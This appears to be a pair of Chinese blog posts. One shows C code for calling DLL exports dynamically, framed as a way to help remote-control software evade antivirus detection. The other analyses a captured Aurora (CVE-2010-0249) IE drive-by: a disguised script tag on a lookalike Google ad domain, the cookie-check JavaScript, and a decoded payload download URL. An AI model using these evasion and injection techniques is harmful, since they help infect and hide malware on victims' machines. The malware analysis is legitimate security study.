VC 动态调用DLL导出函数例子

dev — Sun, 11 Apr 2010 14:40:20 +0000

最近研究了一份远程控制的源码，远程控制的软件通常会造杀毒软件的追杀，但是通过改写源代码可以躲避杀毒软件的查杀。

一般的杀毒软件会通过定位文件的特征码来确定是不是病毒，这些特征码很容修改，而一些高启发式的杀毒软件会查杀远程控制软件的导出表，这就需要程序动态调用DLL导出函数。

下面是两种动态调用DLL导出函数的方法，可以直接照猫画虎来动态调用各种DLL导出函数。

动态调用DLL函数对程序的运行没有任何影响，除了会增大程序的体积。通过Winhex等软件可以看到动态调用DLL导出函数的程序中的API函数都显示在字符串中。

typedef UINT (WINAPI *GetSystemDirectoryAT)
 
 (
	OUT LPSTR lpBuffer,
	IN UINT uSize
    );
GetSystemDirectoryAT pGetSystemDirectoryA= (GetSystemDirectoryAT)GetProcAddress(LoadLibrary("kernel32.dll"),"GetSystemDirectoryA");
 
 
 
#ifdef UNICODE
#define API_GetSystemDirectory  GetSystemDirectoryW
#else
#define API_GetSystemDirectory  GetSystemDirectoryA
#endif // !UNICODE
 
UINT API_GetSystemDirectoryA(LPSTR lpBuffer,UINT uSize)
{
UINT result;
typedef UINT (WINAPI *lpAddFun)(LPSTR,UINT);
HINSTANCE hDll=LoadLibrary("kernel32.dll");
lpAddFun addFun=(lpAddFun)GetProcAddress(hDll,"GetSystemDirectoryA");
if (addFun != NULL)
	{
	addFun(lpBuffer,uSize);	
	FreeLibrary(hDll);	
	}
return result;
}
 
UINT API_GetSystemDirectoryW(LPSTR lpBuffer,UINT uSize)
{
UINT result;
typedef UINT (WINAPI *lpAddFun)(LPSTR,UINT);
HINSTANCE hDll=LoadLibrary("kernel32.dll");
lpAddFun addFun=(lpAddFun)GetProcAddress(hDll,"GetSystemDirectoryW");
if (addFun != NULL)
	{
	addFun(lpBuffer,uSize);
	FreeLibrary(hDll);
	}
return result;
}

极光(CVE-2010-0249)IE 0day漏洞 Shellcode

dev — Sun, 31 Jan 2010 06:11:03 +0000

极光IE 0day漏洞出来好多天了，各种杀毒软件公司极力宣传极光(CVE-2010-0249)IE 0day漏洞多么可怕，什么一打开网页就中招，什么被入侵电脑的游戏帐号可能被盗，银行帐号多么危险。我看这就是一个噱头，无非是骗骗菜鸟在电脑上安装个只占内存不杀毒的垃圾软件，自己的网站服务器都被挂马，还能指望它杀毒？！

在网络媒体报道极光漏洞第二天网上就有极光的Shellcode流出，我从一个被挂马的网站上也抓回一个，在自己机器上测试确实像传说中的一样“不弹，不卡”，就像当年的MS06014。但我在测试过程中发现我抓到的极光的Shellcode只有在IE6下才有效，跟网上报道的有很大出入，在没打补丁的IE7下测试都不能正常执行。

这几天也在关注什么网站被挂马，好第一时间抓个回来，希望能抓到那个被利用攻击谷歌的shellcode。之前公布的极光IE 0day(CVE-2010-0249) 测试 http://www.fendou.info/x/aurora/ 就是针对IE6的。给大家分析一下这马到底是怎么挂到网站上去的。

首先是要入侵网站拿到网站的webshell

拿到网站的额webshell后，就可以直接编辑网站的页面。

在网页上插入挂马代码

我抓到的挂马代码写的特别巧妙，很值得借鉴呢，看下面代码，模仿的谷歌广告代码调用的脚本地址，而且是调用的图片，如果不仔细看是看不出来的。只要在网页上插入这么一段代码，马挂上了。

<script src=http://pagead2.googlesyndication.xx.xx/pagead/logo.gif>

这个图片地址空间是挂马者自己的租用的空间，域名模仿了一些知名网络服务的域名，目的就是让人不易察觉。下面看看这个logo.gif到底是什么东西。

下载回来用写字板打开这个图片文件(其实写字板能打开的文件类型很多哦)内如如下：

function Get(){
function Get(){
var Then = new Date() 
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie1=" 
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){ 
} else 
{ 
document.cookie = "Cookie1=risb;expires="+ Then.toGMTString()
document.writeln("");
}
}Get();

挂马者考虑的还很全面居然写了cookies防止重复中马。其中iframe调用的就是极光的shellcode了。查看代码

我在这段代码中加了一行防止杀毒软件“误杀” Shellcode最终下载并运行的东西存在var u=swyice里面，十六进制转换加密的。用UE就能查看原来的内容内容%u7468%u7074 ->74 68 70 74 ->thpt ->http 看到这儿就能看出Shellcode执行的文件的地址是存在这里的，全部解开后就是：

http://pagead2.googlesyndication.xx.xx/pagead/1.exe

这个1.exe就是最终要在电脑中运行的文件。

后记：
1.极光(CVE-2010-0249)IE 0day漏洞 Shellcode 解密工具
2.IE漏洞实在太多，建议换FireFox浏览器或者其他非IE核心的浏览器。
3.杀毒软件不是万能的，别以为装个杀毒软件就什么网站都上。


如何用手机远程控制电脑	极光(CVE-2010-0249)IE 0day漏洞 Shellcode	浏览器也能连接远程桌面	Mysql弱口令取得系统权限	批处理开启远程桌面
无觅


极光漏洞最新IE 0day漏洞	火狐 Firefox 2010 必备附加组件	QQ2010 最新版本优先体验	2010大盘点《盛世狂欢》- Via AiZaoBao	Web2.0时代搜索引擎该进化了
无觅

奋斗博客 » 杀毒软件

VC 动态调用DLL导出函数例子

极光(CVE-2010-0249)IE 0day漏洞 Shellcode